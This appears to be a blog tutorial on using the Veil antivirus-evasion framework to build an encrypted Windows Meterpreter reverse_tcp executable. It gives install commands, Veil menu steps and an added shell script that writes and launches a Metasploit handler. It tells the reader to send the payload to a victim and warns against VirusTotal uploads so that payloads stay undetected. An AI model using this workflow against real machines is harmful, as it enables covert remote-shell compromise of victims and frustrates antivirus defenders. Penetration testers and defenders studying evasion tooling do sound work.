#avlol

Veil, an antivirus evasion tool created by Chris Truncer, Mike Wright, and The Grayhound, was recently added to the Kali repositories. The developers presented it at NoVA Hackers some weeks ago and it really sparked my interest. I haven’t had much opportunity to test the payloads it creates, however I have heard of numerous successes with it.

Before we get started, PLEASE do not submit your payloads to VirusTotal! VirusTotal shares every submitted sample with the antivirus vendors, so uploading a payload to check it is the fastest way to get it signatured and burn it for everyone.

Installation

Since Veil is now in the Kali repositories, a simple apt-get (as root) will install it for you.

apt-get update && apt-get install veil

This method, however, does not guarantee that you are running the bleeding-edge release of Veil, so you can also pull the project down from GitHub and run its setup script.

git clone https://github.com/veil-evasion/Veil.git
cd Veil/setup/
./setup.sh

Creating a Windows payload

Once installed, start Veil (veil for the apt-get method, ./Veil.py for git). This will load the framework and its current 20 payloads. For the sake of simplicity, we will create a reverse_tcp Meterpreter payload.

First, list all of the available payloads.

list

This will show the available payload names and their rating. For more information on a payload, type:

info $num

where the $num is the number next to the payload.

Choose number 13, python/AESEncrypted, by selecting it with the use command:

use 13

The options are set similarly to Metasploit, so this should be old hat. If you’d like to use pyherion (Veil’s Python crypter, which wraps the generated script in an additional encrypted layer that is decrypted at run time), for example, the syntax would be:

set use_pyherion Y

Now type generate to start generating the payload. The next section will allow you to choose a source for your shellcode. You can either use msfvenom or provide your custom shellcode. Here, we’ll opt for msfvenom.

Hit Enter to accept the default, windows/meterpreter/reverse_tcp. Again, you can use whatever payload you’d like. Now enter the LHOST address (the address the victim will connect back to, so it must be reachable from the victim’s network) and the LPORT number (the port to connect back on). Finally, you can enter any other msfvenom options in OPTION=value syntax, but we’ll skip that for now.

Once you hit Enter, it will generate your shellcode and prompt you to name your payload. You can rename the file later, so just name it something easy to remember for the time being. Then you will be prompted to select the method for creating the executable (in this case Pyinstaller or Py2Exe). Choose Pyinstaller and run.

The payload is now created and a bit of information about it is shown in the terminal, including the output paths. The executable will be dropped in ~/veil-output/sources/ and an RC file will be dropped in ~/veil-output/handlers/. Copy the paths from the terminal output, since they are what this version of Veil actually used.

Receiving sessions

As you may have noticed in the last section, Veil writes a Metasploit resource (RC) file when the payload is generated. Feeding it to msfconsole sets up a multi/handler that listens for the incoming connection with the same payload, LHOST and LPORT you entered, so you do not have to retype them.

To set up the handler, navigate into the handler directory (~/veil-output/handlers/) and run this command with your handler name substituted:

msfconsole -r payload_handler.rc

The handler starts as a background job inside msfconsole and waits for the callback from the payload.

Finally, send the payload out to your victim via your method of choice. Make sure the handler is up before the payload runs; a reverse_tcp stager that finds nothing listening simply fails. Once they click it and it executes, you will have your standard meterpreter session and you can start post exploitation and/or pivoting.
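The handler step above is easy to get wrong when the RC file and the payload drift apart (for example after rebuilding the payload with a new LHOST). The following shell script is an added example, not Veil’s own code or output: it writes a handler RC file equivalent to the one Veil drops in ~/veil-output/handlers/, checks that the handler’s LHOST/LPORT match what the payload was built with, records the payload’s SHA-256 so you can recognise it later without ever uploading it anywhere, and only then launches msfconsole. The ExitOnSession false line is an assumption on my part (it keeps the handler alive after the first callback); the addresses and file names are placeholders.

```shell
#!/bin/sh
# Added example (not part of Veil). Assumes the payload was built with the
# LHOST/LPORT given below; 192.0.2.10:443 and the file names are placeholders.

# Write a Metasploit resource file equivalent to Veil's handler RC.
# exploit -j backgrounds the handler as a job, which is why msfconsole
# returns to its prompt immediately; ExitOnSession false (assumed, not
# from the page) keeps the listener up after the first session connects.
write_handler_rc() {
    wh_payload="$1"; wh_lhost="$2"; wh_lport="$3"; wh_out="$4"
    cat > "$wh_out" <<EOF
use exploit/multi/handler
set PAYLOAD $wh_payload
set LHOST $wh_lhost
set LPORT $wh_lport
set ExitOnSession false
exploit -j
EOF
}

# Returns 0 only if the RC file listens on the given LHOST/LPORT and
# keeps running after the first session; otherwise 1.
check_handler_rc() {
    ch_rc="$1"; ch_lhost="$2"; ch_lport="$3"
    grep -q "^set LHOST $ch_lhost\$" "$ch_rc" || return 1
    grep -q "^set LPORT $ch_lport\$" "$ch_rc" || return 1
    grep -q "^set ExitOnSession false\$" "$ch_rc" || return 1
    return 0
}

# SHA-256 of the built payload, for your own notes. Hash it locally;
# never submit the file itself to a multi-engine scanner.
payload_fingerprint() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Launch the handler only if msfconsole is actually installed.
start_handler() {
    command -v msfconsole >/dev/null 2>&1 || {
        echo "msfconsole not found in PATH" >&2
        return 1
    }
    msfconsole -q -r "$1"
}

# Usage (placeholders): build the RC, verify it against the payload's
# settings, note the hash, then start listening before sending the file.
if [ "${1:-}" = "run" ]; then
    rc="$HOME/veil-output/handlers/payload_handler.rc"
    exe="$HOME/veil-output/sources/payload.exe"
    write_handler_rc windows/meterpreter/reverse_tcp 192.0.2.10 443 "$rc"
    check_handler_rc "$rc" 192.0.2.10 443 || { echo "handler/payload mismatch" >&2; exit 1; }
    [ -f "$exe" ] && echo "payload sha256: $(payload_fingerprint "$exe")"
    start_handler "$rc"
fi
```

Run it with the run argument after editing the placeholders. The mismatch check is the part worth keeping even if you let Veil write the RC file for you: grep the RC for the LHOST and LPORT you typed into Veil before you send anything out.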

More information

There are numerous guides posted on the Veil website showing exactly how to use this method and many others to create payloads. The developers are also on Twitter: @ChrisTruncer, @TheMightyShiv, @the_grayhound

https://www.veil-evasion.com/guidesvideos/